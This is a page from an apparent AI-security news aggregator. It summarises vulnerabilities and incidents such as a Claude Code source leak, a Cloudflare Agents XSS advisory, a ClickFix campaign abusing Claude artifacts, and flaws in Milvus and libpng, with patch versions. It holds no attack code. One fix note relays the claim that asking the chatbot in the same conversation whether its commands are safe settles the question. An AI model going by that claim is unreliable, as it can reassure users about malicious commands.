aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,736
[LAST_24H]
32
[LAST_7D]
176
Daily BriefingWednesday, April 1, 2026
>

Claude Code Source Leaked via npm Packaging Error: Anthropic confirmed that nearly 2,000 TypeScript files (over 512,000 lines of code) from Claude Code were accidentally exposed through a JavaScript package repository, revealing internal features and allowing attackers to study how to bypass safeguards. Users who downloaded the affected package during a specific window on March 31, 2026 may have also received malware-infected software.

>

Google Addresses Vertex AI Security Issues After Weaponization Demo: Palo Alto Networks researchers demonstrated how to weaponize AI agents (autonomous programs that perform tasks with minimal human input) on Google Cloud's Vertex AI platform, prompting Google to begin addressing the disclosed security problems.

>

Latest Intel

page 111/274
VIEW ALL
01

It's been a big — but rocky — week for AI models from China. Here's what's happened

industry
Feb 14, 2026

Chinese tech companies Alibaba, ByteDance, and Kuaishou released new AI models this week that compete with Western AI tools in robotics and video generation. Alibaba's RynnBrain helps robots understand and interact with physical objects by tracking time and location, while ByteDance's Seedance 2.0 generates realistic videos from text prompts. However, ByteDance suspended Seedance's voice generation feature after concerns emerged that it was creating voices without the consent of the people whose images were used.

Critical This Week5 issues
critical

CVE-2026-34162: FastGPT is an AI Agent building platform. Prior to version 4.14.9.5, the FastGPT HTTP tools testing endpoint (/api/core/

CVE-2026-34162NVD/CVE DatabaseMar 31, 2026
Mar 31, 2026

Meta Smartglasses Raise Privacy Concerns with Covert Recording: Meta's smartglasses feature a built-in camera and AI assistant that can describe surroundings and answer questions, but raise significant privacy issues because they can record video of others without knowledge or consent.

CNBC Technology
02

Anthropic's public benefit mission

policy
Feb 13, 2026

Anthropic is a public benefit corporation (a company legally structured to serve public interest, not just shareholders) that has stated its mission as developing AI responsibly for humanity's benefit. The company's official incorporation documents show this mission statement has remained consistent from 2021 to 2024, with only minor wording updates.

Simon Willison's Weblog
03

The evolution of OpenAI's mission statement

policyindustry
Feb 13, 2026

This article tracks how OpenAI's official mission statement, filed annually with the IRS (the U.S. tax authority), changed between 2016 and 2024. Over time, OpenAI removed mentions of openly sharing capabilities, dropped the phrase "as a whole" from "benefit humanity," shifted from wanting to "help" build safe AI to committing to "develop and responsibly deploy" it themselves, and eventually cut the mission down to a single sentence focused on ensuring artificial general intelligence (AI systems designed to handle any task a human can) benefits all of humanity, while notably removing any mention of safety.

Simon Willison's Weblog
04

Anthropic got an 11% user boost from its OpenAI-bashing Super Bowl ad, data shows

industry
Feb 13, 2026

Anthropic's Super Bowl advertisement criticizing OpenAI's decision to add ads to ChatGPT resulted in an 11% increase in daily active users for Claude (Anthropic's chatbot), outperforming competing AI chatbots from OpenAI, Google, and Meta. The ad campaign reflects growing competition between AI companies as they vie for users and enterprise customers ahead of potential future public offerings.

CNBC Technology
05

GHSA-w5cr-2qhr-jqc5: Cloudflare Agents has a Reflected Cross-Site Scripting (XSS) vulnerability in AI Playground site

security
Feb 13, 2026

A Reflected XSS vulnerability (reflected XSS, where malicious code is injected through a URL parameter and executed in a user's browser) was found in Cloudflare Agents' AI Playground OAuth callback handler. An attacker could craft a malicious link that, when clicked, steals user chat history, LLM interactions, and could control connected MCP Servers (tools that extend what an AI can do) on behalf of the victim.

Fix: Agents-sdk users should upgrade to agents@0.3.10. Developers using configureOAuthCallback with custom error handling should ensure all user-controlled input is escaped (converted to safe text that won't be interpreted as code) before being inserted into HTML. See PR: https://github.com/cloudflare/agents/pull/841

GitHub Advisory Database
06

Claude LLM artifacts abused to push Mac infostealers in ClickFix attack

security
Feb 13, 2026

Threat actors are abusing Claude artifacts (AI-generated content shared publicly on claude.ai) and Google Ads to trick macOS users into running malicious commands that install MacSync infostealer malware (software that steals sensitive data like passwords and crypto wallets). Over 10,000 users have viewed these fake guides disguised as legitimate tools like DNS resolvers or HomeBrew package managers.

Fix: Users are recommended to exert caution and avoid executing in Terminal commands they don't fully understand. As noted by Kaspersky researchers, asking the chatbot in the same conversation about the safety of the provided commands is a straightforward way to determine if they're safe or not.

BleepingComputer
07

CVE-2026-26190: Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus expose

security
Feb 13, 2026

Milvus, a vector database (a specialized storage system for AI data) used in generative AI applications, had a security flaw in versions before 2.5.27 and 2.6.10 where it exposed port 9091 by default, allowing attackers to bypass authentication (security checks that verify who you are) in two ways: through a predictable default token on a debug endpoint, and by accessing the full REST API (the interface applications use to communicate with the database) without any password or login required, potentially letting them steal or modify data.

Fix: Update to Milvus version 2.5.27 or 2.6.10, where this vulnerability is fixed.

NVD/CVE Database
08

Researchers unearth 30-year-old vulnerability in libpng library

security
Feb 13, 2026

Researchers discovered a heap buffer overflow (a type of memory corruption flaw where data overflows a temporary memory area) in libpng, a widely-used library for reading and editing PNG image files, that existed for 30 years. The vulnerability in the png_set_quantize function could cause crashes or potentially allow attackers to extract data or execute remote code (run commands on a victim's system), but exploitation requires careful preparation and the flaw is rarely triggered in practice. The flaw affects all libpng versions before 1.6.55.

Fix: The vulnerability is fixed in libpng version 1.6.55.

CSO Online
09

Battling bots face off in cybersecurity arena

researchindustry
Feb 13, 2026

Wiz created a benchmark suite of 257 real-world cybersecurity challenges across five areas (zero-day discovery, CVE detection, API security, web security, and cloud security) to test which AI agents perform best at cybersecurity tasks. The benchmark runs tests in isolated Docker containers (sandboxed environments that prevent interference with the main system) and scores agents based on their ability to detect vulnerabilities and security issues, with Claude Code performing best overall.

CSO Online
10

Anthropic taps ex-Microsoft CFO, Trump aide Liddell for board

industry
Feb 13, 2026

Anthropic, a startup known for developing Claude (an AI assistant), appointed Chris Liddell, a former Microsoft CFO and Trump administration official, to its board of directors. This move may help improve Anthropic's relationship with the Trump administration, which previously criticized the company for its stance on AI regulation.

CNBC Technology
Prev1...109110111112113...274Next
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026